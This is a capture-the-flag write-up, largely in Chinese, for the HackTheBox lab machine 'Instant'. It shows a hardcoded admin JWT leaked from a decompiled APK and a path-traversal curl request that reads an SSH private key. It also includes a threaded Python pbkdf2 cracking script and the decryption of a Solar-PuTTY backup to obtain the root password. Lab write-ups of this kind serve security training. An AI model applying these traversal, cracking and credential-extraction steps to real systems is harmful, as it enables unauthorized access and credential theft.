Instant on HackTheBox

,

Before all

Victim’s IP : 10.10.11.37
Victim’s Host : *.instant.htb
Attacker’s IP : 10.10.14.10

RECON

port scan

Command 

1
rustscan -a 10.10.11.37 --ulimit 5000 -- -sC -sV -Pn

port 22 跟 80,拿到域名是instant.htb

Exploit

apk reverse info leaks

丟到 decompiler.com de apk 一下,載下來 grep 就發現 leak 了一些 host 跟一組 admin 的 JWT Token
/sources/com/instantlabs/instant/AdminActivities.java 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
package com.instantlabs.instant;

import com.google.gson.JsonParser;
import com.google.gson.JsonSyntaxException;
import java.io.IOException;
import okhttp3.Call;
import okhttp3.Callback;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;

public class AdminActivities {
    private String TestAdminAuthorization() {
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/view/profile").addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA").build()).enqueue(new Callback() {
            static final /* synthetic */ boolean $assertionsDisabled = false;

            static {
                Class<AdminActivities> cls = AdminActivities.class;
            }

            public void onFailure(Call call, IOException iOException) {
                System.out.println("Error Here : " + iOException.getMessage());
            }

            public void onResponse(Call call, Response response) throws IOException {
                if (response.isSuccessful()) {
                    try {
                        System.out.println(JsonParser.parseString(response.body().string()).getAsJsonObject().get("username").getAsString());
                    } catch (JsonSyntaxException e) {
                        System.out.println("Error Here : " + e.getMessage());
                    }
                }
            }
        });
        return "Done";
    }
}

另外,grep 出來的subdomains 

1
2
./resources/res/8G.xml:        <domain includeSubdomains="true">mywalletv1.instant.htb
./resources/res/8G.xml:        <domain includeSubdomains="true">swagger-ui.instant.htb

其中,swagger-ui.instant.htb紀載了api的用法,這邊我找到了/api/v1/admin/read/log,參數為log_file_name
image

LFI through admin api

利用LFI讀取 SSH PRIVATE KEY: 

1
curl 'http://mywalletv1.instant.htb/api/v1/admin/read/log?log_file_name=../.ssh/id_rsa' -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA'

image

接著 ssh 登入即可 

1
sudo ssh [email protected] -i id_rsa

Privilege Escalation

password cracking

用linpeas輔助掃描路徑,找到服務的db
/home/shirohige/projects/mywallet/Instant-Api/mywallet/instance/instant.db
這個path,下載回來拿到一組 pbkdf2 hash 屬於使用者 shirohige
John和HashCat辨識不了,自己搓腳本: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import hashlib
import threading
from queue import Queue

hash_to_crack = "pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed"
parts = hash_to_crack.split('$')
algorithm_iterations = parts[0]
salt = parts[1]
target_hash = parts[2]

iterations = int(algorithm_iterations.split(':')[-1])

wordlist_path = "/home/kali/rockyou.txt"

queue = Queue()
num_threads = 100
found = False
lock = threading.Lock()

def worker():
    global found
    while not queue.empty() and not found:
        password = queue.get().strip()
        hashed_password = hashlib.pbkdf2_hmac(
            'sha256',
            password.encode(),
            salt.encode(),
            iterations
        ).hex()
        if hashed_password == target_hash:
            with lock:
                found = True
                print(f"[+] Password found: {password}")
        queue.task_done()

def main():
    global found
    print("[*] Loading wordlist and starting threads...")

    try:
        with open(wordlist_path, "r", encoding="latin-1") as wordlist:
            for line in wordlist:
                queue.put(line.strip())

        threads = []
        for _ in range(num_threads):
            t = threading.Thread(target=worker)
            t.daemon = True
            threads.append(t)
            t.start()

        queue.join()

        if not found:
            print("[-] Password not found in the wordlist.")
    except FileNotFoundError:
        print(f"[!] Wordlist not found: {wordlist_path}")

if __name__ == "__main__":
    main()

獲得密碼:estrella

Decrypt Solar-PuTTY data

發現另一個可疑目錄,/opt/backups/Solar-PuTTY,上網 google 一下知道是一種ssh/sftp/scp 等方法的 session,需要一個密碼開啟
底下只有一個檔案 sessions-backup.dat: 

1
ZJlEkpkqLgj2PlzCyLk4gtCfsGO2CMirJoxxdpclYTlEshKzJwjMCwhDGZzNRr0fNJMlLWfpbdO7l2fEbSl/OzVAmNq0YO94RBxg9p4pwb4upKiVBhRY22HIZFzy6bMUw363zx6lxM4i9kvOB0bNd/4PXn3j3wVMVzpNxuKuSJOvv0fzY/ZjendafYt1Tz1VHbH4aHc8LQvRfW6Rn+5uTQEXyp4jE+ad4DuQk2fbm9oCSIbRO3/OKHKXvpO5Gy7db1njW44Ij44xDgcIlmNNm0m4NIo1Mb/2ZBHw/MsFFoq/TGetjzBZQQ/rM7YQI81SNu9z9VVMe1k7q6rDvpz1Ia7JSe6fRsBugW9D8GomWJNnTst7WUvqwzm29dmj7JQwp+OUpoi/j/HONIn4NenBqPn8kYViYBecNk19Leyg6pUh5RwQw8Bq+6/OHfG8xzbv0NnRxtiaK10KYh++n/Y3kC3t+Im/EWF7sQe/syt6U9q2Igq0qXJBF45Ox6XDu0KmfuAXzKBspkEMHP5MyddIz2eQQxzBznsgmXT1fQQHyB7RDnGUgpfvtCZS8oyVvrrqOyzOYl8f/Ct8iGbv/WO/SOfFqSvPQGBZnqC8Id/enZ1DRp02UdefqBejLW9JvV8gTFj94MZpcCb9H+eqj1FirFyp8w03VHFbcGdP+u915CxGAowDglI0UR3aSgJ1XIz9eT1WdS6EGCovk3na0KCz8ziYMBEl+yvDyIbDvBqmga1F+c2LwnAnVHkFeXVua70A4wtk7R3jn8+7h+3Evjc1vbgmnRjIp2sVxnHfUpLSEq4oGp3QK+AgrWXzfky7CaEEEUqpRB6knL8rZCx+Bvw5uw9u81PAkaI9SlY+60mMflf2r6cGbZsfoHCeDLdBSrRdyGVvAP4oY0LAAvLIlFZEqcuiYUZAEgXgUpTi7UvMVKkHRrjfIKLw0NUQsVY4LVRaa3rOAqUDSiOYn9F+Fau2mpfa3c2BZlBqTfL9YbMQhaaWz6VfzcSEbNTiBsWTTQuWRQpcPmNnoFN2VsqZD7d4ukhtakDHGvnvgr2TpcwiaQjHSwcMUFUawf0Oo2+yV3lwsBIUWvhQw2g=

使用這個工具:
https://github.com/VoidSec/SolarPuttyDecrypt/releases/tag/v1.0

指令: 

1
SolarPuttyDecrypt.exe sessions-backup.dat estrella
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
-----------------------------------------------------
SolarPutty's Sessions Decrypter by VoidSec
-----------------------------------------------------

{
  "Sessions": [
    {
      "Id": "066894ee-635c-4578-86d0-d36d4838115b",
      "Ip": "10.10.11.37",
      "Port": 22,
      "ConnectionType": 1,
      "SessionName": "Instant",
      "Authentication": 0,
      "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
      "AuthenticateScript": "00000000-0000-0000-0000-000000000000",
      "LastTimeOpen": "0001-01-01T00:00:00",
      "OpenCounter": 1,
      "SerialLine": null,
      "Speed": 0,
      "Color": "#FF176998",
      "TelnetConnectionWaitSeconds": 1,
      "LoggingEnabled": false,
      "RemoteDirectory": ""
    }
  ],
  "Credentials": [
    {
      "Id": "452ed919-530e-419b-b721-da76cbe8ed04",
      "CredentialsName": "instant-root",
      "Username": "root",
      "Password": "12**24nzC!r0c%q12",
      "PrivateKeyPath": "",
      "Passphrase": "",
      "PrivateKeyContent": null
    }
  ],
  "AuthScript": [],
  "Groups": [],
  "Tunnels": [],
  "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}

最後拿獲得的密碼12**24nzC!r0c%q12 登入 root 成功!

After all

等待放榜 搓手手中